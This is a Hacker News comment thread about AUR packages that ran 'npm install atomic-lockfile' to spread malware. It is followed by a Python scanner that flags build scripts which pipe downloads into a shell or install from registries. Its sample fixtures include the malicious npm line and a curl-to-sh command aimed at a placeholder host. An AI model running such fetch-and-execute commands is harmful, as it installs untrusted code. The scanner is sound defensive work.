Comment by Retr0id 7 days ago

This doesn't really have anything to do with npm.

5 comments

notabotiswear 7 days ago

From the Arch mailing list [0]

> The result is a rather long list of ~408 packages all doing npm install atomic-lockfile something something

[0] https://lists.archlinux.org/archives/list/aur-general@lists....

    Retr0id 7 days ago

    They could've pip installed, curl|sh'd or anything else, it's not relevant to the underlying issue.

        notabotiswear 7 days ago

        Perhaps there were other vectors, but npm was the one used here.

        And yes, this is an AUR issue, but npm being used to host and disseminate malware is also [a chronic] one, even if separate.

vitamark 7 days ago

anything except that it's malware installed via npm

    Retr0id 7 days ago

    As you can see here, they've already switched it out for a different command, likely due to incident responders over-indexing on npm as an IOC.

    https://news.ycombinator.com/item?id=48503258
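The mailing-list result quoted in the thread came from matching the literal string `npm install atomic-lockfile` across PKGBUILDs, and the last comment notes that the command was later swapped for something else. As an added example (not code from this thread, from the Arch project or from any AUR package), here is a small scanner that keys on the behaviour a PKGBUILD exhibits at build time (a registry install via npm/pip, or a download piped straight into a shell) rather than on one package name, and that skips installs which only touch a vendored tarball under `$srcdir`, the pattern legitimate nodejs packages use. The sample PKGBUILDs, package names and the `example.invalid` URL are constructed for illustration; the only identifier taken from the page is the `atomic-lockfile` package name.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Build-time commands that fetch and run code from a remote ecosystem.
# Keying on the behaviour rather than on "atomic-lockfile" means the scan
# still fires when the npm line is replaced with a pip or curl|sh equivalent.
PATTERNS = {
    "npm-install": re.compile(
        r"\b(?:npm|npx|pnpm|yarn)\s+(?:install|i|add|exec)\b(?P<args>[^|;&\n]*)"),
    "pip-install": re.compile(r"\bpip3?\s+install\b(?P<args>[^|;&\n]*)"),
    "pipe-to-shell": re.compile(
        r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
}

# Arguments that point at the local build tree (a vendored tarball or
# directory under $srcdir, or an install prefix under $pkgdir) rather than
# at a registry name. Heuristic, not a proof of safety.
LOCAL_ARG = re.compile(
    r"^\.{1,2}$|^\.{0,2}/|\$\{?(?:srcdir|pkgdir|startdir)\}?|\.(?:tgz|tar\.gz|whl)$")


@dataclass
class Finding:
    package: str
    line_no: int
    kind: str
    text: str


def is_local_install(args: str) -> bool:
    """True when every non-flag argument of an install command is a local path."""
    tokens = [t.strip("\"'") for t in args.split() if not t.startswith("-")]
    return bool(tokens) and all(LOCAL_ARG.search(t) for t in tokens)


def scan_pkgbuild(package: str, text: str) -> list[Finding]:
    """Return one Finding per line that performs a remote fetch-and-execute."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for kind, pat in PATTERNS.items():
            m = pat.search(line)
            if not m:
                continue
            if kind != "pipe-to-shell" and is_local_install(m.group("args")):
                continue  # installing a vendored artifact, no registry access
            findings.append(Finding(package, line_no, kind, line))
    return findings


def scan_tree(pkgbuilds: dict[str, str]) -> dict[str, list[Finding]]:
    """Scan many PKGBUILDs; keep only packages with at least one finding."""
    result = {name: scan_pkgbuild(name, text) for name, text in pkgbuilds.items()}
    return {name: f for name, f in result.items() if f}


def summarize(hits: dict[str, list[Finding]]) -> Counter:
    """Count findings by kind, to see which vector a campaign actually uses."""
    return Counter(f.kind for fs in hits.values() for f in fs)


# Constructed sample PKGBUILDs (not real AUR packages); example-c and
# example-d show legitimate local installs that a bare "npm install" or
# "pip install" grep would wrongly flag.
SAMPLES = {
    "example-a": "pkgname=example-a\npkgver=1.0\nbuild() {\n"
                 "  cd \"$srcdir/$pkgname-$pkgver\"\n"
                 "  npm install atomic-lockfile\n  make\n}\n",
    "example-b": "pkgname=example-b\nbuild() {\n"
                 "  curl -fsSL https://example.invalid/setup.sh | sh\n}\n",
    "nodejs-example-c": "pkgname=nodejs-example-c\npackage() {\n"
                        "  # vendored tarball, no registry access\n"
                        "  npm install -g --prefix \"$pkgdir/usr\" "
                        "\"$srcdir/$pkgname-$pkgver.tgz\"\n}\n",
    "python-example-d": "pkgname=python-example-d\nbuild() {\n"
                        "  pip install --no-deps .\n}\n",
}

if __name__ == "__main__":
    hits = scan_tree(SAMPLES)
    for name, fs in hits.items():
        for f in fs:
            print(f"{name}:{f.line_no}: [{f.kind}] {f.text}")
    print(dict(summarize(hits)))
```

On a real AUR checkout the `SAMPLES` dict would be replaced by reading each `PKGBUILD` from disk; the output is a triage list, not a verdict, since a registry install in `build()` is common in legitimate packages too. The useful property is the one the thread argues about: a campaign that rotates from npm to pip or curl|sh still shows up, and `summarize()` makes the rotation visible instead of hiding it behind a single npm-based IOC.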